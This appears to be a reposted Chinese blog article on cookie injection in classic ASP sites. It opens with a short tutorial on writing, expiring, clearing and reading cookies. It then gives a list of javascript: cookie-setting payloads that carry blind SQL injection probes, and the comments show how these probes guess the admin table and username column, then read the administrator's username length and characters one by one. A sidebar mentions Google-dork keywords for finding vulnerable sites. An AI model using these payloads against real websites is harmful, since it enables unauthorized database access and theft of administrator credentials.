`
jila
  • 浏览: 7640 次
  • 性别: Icon_minigender_1
  • 来自: 上海
文章分类
社区版块
存档分类
最新评论

Cookies注入详解与指令

阅读更多
Cookies注入详解与指令 2009-10-29 10:19:54  www.hackbase.com  来源:互联网
  1.如何写入Cookies?  Response.Cookies("字段名")=变量或字符串,例如:  Response.Cookies("name2")="Dingdang"    2.如何设置Cookies时间?  Response.Cookies("字段名").expires=时间 ...
  1.如何写入Cookies?
  Response.Cookies("字段名")=变量或字符串,例如:
  Response.Cookies("name2")="Dingdang"
  
  2.如何设置Cookies时间?
  Response.Cookies("字段名").expires=时间函数+N,例如:
  Response.Cookies("name2").expires=date+1,表示Cookies保存1天,再比如:
  Response.Cookies("name2").expires=Hour+8,表示Cookies保存8小时。
  
  3.在以往的ASP教程中,很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写:
  Response.Cookies("字段名")=""
  之后,在客户端的浏览器就清除了Cookies,并且Cookies文件会消失。注意有多少个字段,就要写多少句来清除。
  
  4.如何读取Cookies?
  变量名=Request.Cookies("字段名"),例如:
  name2=Request.Cookies("name2")
  如果网页中写入<%=name2%>这句,则会显示“Dingdang”。
  也可以这样直接读取Cookies,<%=Request.Cookies("name2")%>
  
  Cookies是属于Session对象的一种。但有不同,Cookies不会占服务器资源;而“Session”则会占用服务器资源。所以,尽量不要使用Session,而使用Cookies。
  
  指令:
  
  javascript:alert(document.cookie="id="+escape("156 and 1=1"));
  javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
  //猜是否有admin表
  javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
  //猜是否有username表
  javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
  //看管理员密码是否是5位
  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
  //第一位是否是ASC码97,相当于a
  javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
  //第二位
  javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
  //看系统表
分享到:
评论

相关推荐

    JAVA WEB 开发详解:XML+XSLT+SERVLET+JSP 深入剖析与实例应用.part2

    9.1.2 cookies 304 9.1.3 url重写 305 9.2 java servlet api的会话跟踪 306 9.2.1 httpsession接口 306 9.2.2 session的生命周期 307 9.2.3 cookie的应用 319 9.2.4 httpsessionbindinglistener接口 328 ...

    详解angularjs popup-table 弹出框表格指令

    本文将详解AngularJS中的popup-table指令,该指令用于在网页中创建弹出框样式的表格组件。 在深入理解popup-table指令之前,先了解几个关键点是非常必要的。首先,AngularJS中的指令是通过定义一个新元素或者属性来...

    JAVA WEB 开发详解:XML+XSLT+SERVLET+JSP 深入剖析与实例应用.part4

    9.1.2 cookies 304 9.1.3 url重写 305 9.2 java servlet api的会话跟踪 306 9.2.1 httpsession接口 306 9.2.2 session的生命周期 307 9.2.3 cookie的应用 319 9.2.4 httpsessionbindinglistener接口 328 ...

    JAVA WEB 开发详解:XML+XSLT+SERVLET+JSP 深入剖析与实例应用.part5

    9.1.2 cookies 304 9.1.3 url重写 305 9.2 java servlet api的会话跟踪 306 9.2.1 httpsession接口 306 9.2.2 session的生命周期 307 9.2.3 cookie的应用 319 9.2.4 httpsessionbindinglistener接口 328 ...

    JAVA WEB 开发详解:XML+XSLT+SERVLET+JSP 深入剖析与实例应用.part3

    9.1.2 cookies 304 9.1.3 url重写 305 9.2 java servlet api的会话跟踪 306 9.2.1 httpsession接口 306 9.2.2 session的生命周期 307 9.2.3 cookie的应用 319 9.2.4 httpsessionbindinglistener接口 328 ...

    详解AngularJS中module模块的导入导出

    AngularJS是一款来自Google的前端JS框架,它的核心特性有:MVC、双向数据绑定、指令和语义化标签、模块化工具、依赖注入、HTML模板,以及对常用工具的封装,例如$http、$cookies、$location等。 关于AngularJS中...

    angularjs-code.zip

    **AngularJS 1.x 知识点详解** AngularJS,作为一个强大的前端JavaScript框架,由Google维护,主要用于构建单页面应用程序(SPA)。它通过双向数据绑定、依赖注入、指令系统等特性,极大地简化了Web开发流程。下面...

    angularJs源代码

    **AngularJS 源代码详解** AngularJS,作为Google推出的一款强大的JavaScript框架,自发布以来就备受开发者青睐。它主要用于构建动态Web应用,通过MVC(Model-View-Controller)架构模式,使得前端开发变得更加简洁...

    ssh项目实例

    Servlet通过HttpServlet类处理HTTP请求,实现了与客户端的交互,并且可以通过会话跟踪、cookies等技术保持用户状态。 Struts是一个开源的MVC(Model-View-Controller)框架,它简化了基于Java的Web应用开发。Struts...

    PHP 转义使用详解

    magic_quotes_gpc是一个PHP配置指令,它影响通过GET、POST、Cookies接收到的数据。当magic_quotes_gpc开启时(即值为1),接收到的数据中的单引号(')、双引号(")和反斜杠(\)会被自动转义(即在这些特殊字符前加上反...

    基于ASP的窝窝网聚音乐分享程序 v3.0.zip

    【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在“基于ASP的窝窝网聚音乐分享程序 v3.0.zip”这个压缩包中,我们可以推测它包含了一个利用ASP技术...

    基于ASP的大型婚纱摄影网 v1.0.zip

    【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在“基于ASP的大型婚纱摄影网 v1.0.zip”这个项目中,我们可以深入探讨ASP在构建大型网站时的应用及其...

    7k7k漫画网程序 -ASP源码.zip

    【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在1996年,ASP首次亮相,为Web开发者提供了一个简单而强大的工具来构建动态网站。它允许开发人员将...

    基于ASP的重庆职业技术学院整站源码 v2.0 修复版.zip

    【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在1996年,ASP首次亮相,为Web开发者提供了一个强大的工具,允许他们将HTML、脚本语言和服务器组件...

    基于ASP的无酒电影网站源码 v1.0.zip

    【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在“基于ASP的无酒电影网站源码 v1.0.zip”这个项目中,我们可以深入理解ASP的核心概念和应用。 1. ...

    学习javaweb的学习过程

    #### 五、JSP页面指令与内置对象 - **Page指令**:`&lt;%@ page %&gt;`标签用于设置JSP页面的各种属性,如编码方式、错误处理等。 - **内置对象**:JSP提供了多个内置对象简化页面处理,如`out`用于输出数据、`request`...

    JSP-photo.rar_jsp相册

    **JSP相册管理系统详解** JSP(JavaServer Pages)是一种动态网页技术,它允许开发者在HTML或XML文档中嵌入Java代码,从而实现服务器端的动态内容生成。本项目"JSP-photo.rar_jsp相册"是一个针对初学者设计的简单...

    asp网络程序设计题解

    **ASP网络程序设计题解详解** ASP(Active Server Pages)是一种经典的服务器端脚本语言,由微软公司开发,用于创建动态、交互式的Web应用程序。它允许开发者在HTML代码中嵌入脚本语言,如VBScript或JScript,使得...

    五洲音乐网第二版 -ASP源码.zip

    【ASP技术详解】 ASP(Active Server Pages)是微软公司推出的一种服务器端脚本环境,用于创建动态交互式网页。在1996年,ASP首次亮相,为Web开发者提供了一个强大的工具,允许他们将HTML、脚本语言和服务器组件...

    google入侵网站常用关键词汇总

    29. **רCookies**: 用于搜索与Cookie相关的页面,可能存在会话劫持的风险。 30. **data/team.mdb**: 用于搜索包含团队信息的数据库文件,可能存在未加密的数据。 31. **/database/mysz**: 用于搜索特定的数据库...

Global site tag (gtag.js) - Google Analytics